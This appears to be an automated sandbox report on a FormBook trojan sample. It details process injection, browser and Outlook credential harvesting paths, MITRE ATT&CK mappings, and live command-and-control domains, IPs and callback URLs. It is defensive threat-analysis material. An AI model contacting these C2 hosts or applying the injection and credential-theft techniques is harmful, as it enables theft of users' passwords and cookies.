Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mtstocom.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mtstocom.exe

Thread register set: target process: 6252

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\mtstocom.exe

Thread APC queued: target process: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 5BB008

Jump to behavior

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

0_2_007C1201

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007A2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_007A2BA5

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007CB226 SendInput,keybd_event,

0_2_007CB226

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007E22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_007E22DA

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FG5wHs4fVX.exe"	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

0_2_007C0B62

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007C1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_007C1663

Source: FG5wHs4fVX.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: iiYhUrEPyAr.exe, 00000006.00000000.1949965788.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2634315182.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101054980.0000000000D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: FG5wHs4fVX.exe, iiYhUrEPyAr.exe, 00000006.00000000.1949965788.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2634315182.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101054980.0000000000D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: iiYhUrEPyAr.exe, 00000006.00000000.1949965788.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2634315182.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101054980.0000000000D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: iiYhUrEPyAr.exe, 00000006.00000000.1949965788.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2634315182.0000000001291000.00000002.00000001.00040000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101054980.0000000000D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_00780698 cpuid

0_2_00780698

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007D8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_007D8195

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007BD27A GetUserNameW,

0_2_007BD27A

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_0079B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0079B952

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007642DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mtstocom.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: FG5wHs4fVX.exe	Binary or memory string: WIN_81
Source: FG5wHs4fVX.exe	Binary or memory string: WIN_XP
Source: FG5wHs4fVX.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: FG5wHs4fVX.exe	Binary or memory string: WIN_XPe
Source: FG5wHs4fVX.exe	Binary or memory string: WIN_VISTA
Source: FG5wHs4fVX.exe	Binary or memory string: WIN_7
Source: FG5wHs4fVX.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007E1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_007E1204
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007E1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_007E1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FG5wHs4fVX.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
FG5wHs4fVX.exe	37%	Virustotal		Browse
FG5wHs4fVX.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.cloijz.info/r4db/	100%	Avira URL Cloud	phishing
http://www.xinchaocjcela.net/uw0r/?vlKLavJp=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRMbOt/OPSf4dzGL/I4GGe8jtT/v+mCQ==&oLbh=Z4SLXZCPeLcly	100%	Avira URL Cloud	malware
http://www.wuyyv4tq.top/30sl/?oLbh=Z4SLXZCPeLcly&vlKLavJp=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t+LWy3lELjPgtDlmd7njEJtKsP2gRrQ==	0%	Avira URL Cloud	safe
http://www.xinchaocjcela.net	0%	Avira URL Cloud	safe
http://www.cloijz.info/r4db/?vlKLavJp=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpHAtCoiRayvgo5qh3BGhuPHZLV4qkZw==&oLbh=Z4SLXZCPeLcly	100%	Avira URL Cloud	phishing
http://www.xinchaocjcela.net/uw0r/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.xinchaocjcela.net	18.143.155.63	true	false	unknown
www.grimbo.boats	104.21.18.171	true	false	high
www.cloijz.info	47.83.1.90	true	false	unknown
www.wuyyv4tq.top	156.226.63.13	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cloijz.info/r4db/	false	Avira URL Cloud: phishing	unknown
http://www.wuyyv4tq.top/30sl/?oLbh=Z4SLXZCPeLcly&vlKLavJp=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t+LWy3lELjPgtDlmd7njEJtKsP2gRrQ==	false	Avira URL Cloud: safe	unknown
http://www.xinchaocjcela.net/uw0r/	false	Avira URL Cloud: malware	unknown
http://www.xinchaocjcela.net/uw0r/?vlKLavJp=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRMbOt/OPSf4dzGL/I4GGe8jtT/v+mCQ==&oLbh=Z4SLXZCPeLcly	false	Avira URL Cloud: malware	unknown
http://www.cloijz.info/r4db/?vlKLavJp=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpHAtCoiRayvgo5qh3BGhuPHZLV4qkZw==&oLbh=Z4SLXZCPeLcly	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.xinchaocjcela.net	iiYhUrEPyAr.exe, 00000008.00000002.2634275836.0000000000816000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
47.83.1.90	www.cloijz.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
18.143.155.63	www.xinchaocjcela.net	United States	16509	AMAZON-02US	false
156.226.63.13	www.wuyyv4tq.top	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587853
Start date and time:	2025-01-10 18:35:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FG5wHs4fVX.exe renamed because original name is a hash value
Original Sample Name:	9300490b5573632ebb7a5bfcf1f2b75b6e6a5b23a3af159b9aa19b10274ce0db.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@6/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 46 Number of non-executed functions: 309
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:38:31	API Interceptor	28x Sleep call for process: mtstocom.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
47.83.1.90	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	www.cloijz.info/r4db/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/hf4a/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cruycq.info/6jon/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.cruycq.info/mywm/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
18.143.155.63	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	www.xinchaocjcela.net/uw0r/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.xinchaocjcela.net/bpfk/
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	8CO4P3HwDt.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	66HKNPT1fl.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	8CO4P3HwDt.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	nnzZhhVIqM.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.grimbo.boats	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	inv#12180.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
www.cloijz.info	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.cloijz.info	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.xinchaocjcela.net	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
www.xinchaocjcela.net	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
www.wuyyv4tq.top	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	CJE003889.exe	Get hash	malicious	FormBook	Browse	156.226.63.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	34.250.141.206
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	108.138.26.51
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	3.120.85.61
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	3.131.211.191
	https://cjerichmond.jimdosite.com/	Get hash	malicious	Unknown	Browse	3.255.10.234
	Setup.exe	Get hash	malicious	Unknown	Browse	13.32.99.65
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	44.239.30.202
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
VODANETInternationalIP-BackboneofVodafoneDE	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	1162-201.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	5.elf	Get hash	malicious	Unknown	Browse	88.79.50.180
	6.elf	Get hash	malicious	Unknown	Browse	178.10.231.77
	armv4l.elf	Get hash	malicious	Unknown	Browse	88.68.235.154
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	188.101.106.73
